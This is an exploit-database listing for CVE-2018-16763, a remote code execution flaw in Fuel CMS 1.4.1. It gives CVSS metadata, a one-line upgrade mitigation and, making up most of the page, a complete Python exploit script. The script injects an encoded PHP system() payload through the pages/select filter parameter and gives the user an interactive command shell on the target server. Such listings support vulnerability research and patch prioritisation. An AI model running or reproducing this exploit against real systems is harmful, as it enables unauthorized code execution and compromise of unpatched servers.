header-logo
Suggest Exploit
vendor:
Fuel CMS
by:
Padsala Trushal
9.8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: Fuel CMS
Affected Version From: <= 1.4.1
Affected Version To: <= 1.4.1
Patch Exists: YES
Related CWE: CVE-2018-16763
CPE: a:daylightstudio:fuel_cms:1.4.1
Metasploit:
Other Scripts:
Tags: cve,cve2018,fuelcms,rce,edb
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.exploit-db.com/exploits/47138https://www.getfuelcms.com/https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1https://nvd.nist.gov/vuln/detail/CVE-2018-16763https://github.com/daylightstudio/FUEL-CMS/issues/478
Nuclei Metadata: {'max-request': 1, 'vendor': 'thedaylightstudio', 'product': 'fuel_cms'}
Platforms Tested: Ubuntu - Apache2 - php5
2021

Fuel CMS 1.4.1 – Remote Code Execution (3)

Fuel CMS 1.4.1 is vulnerable to Remote Code Execution. An attacker can exploit this vulnerability by sending a crafted request to the application. This will allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Fuel CMS.
Source

Exploit-DB raw data:

# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

#!/usr/bin/python3

import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style

def get_arguments():
	parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')

	parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')

	parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')

	args = parser.parse_args()

	if len(sys.argv) <=2:
		parser.print_usage()
		sys.exit()
	
	return args


args = get_arguments()
url = args.url 

if "http" not in url:
	sys.stderr.write("Enter vaild url")
	sys.exit()

try:
   r = requests.get(url)
   if r.status_code == 200:
       print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)


except requests.ConnectionError:
    print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
    sys.exit()

while True:
	cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
		
	main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"

	r = requests.get(main_url)

	#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

	output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
	print(output[0])
	if cmd == "exit":
		break

Navigation

Suggest Exploit

Services By CQR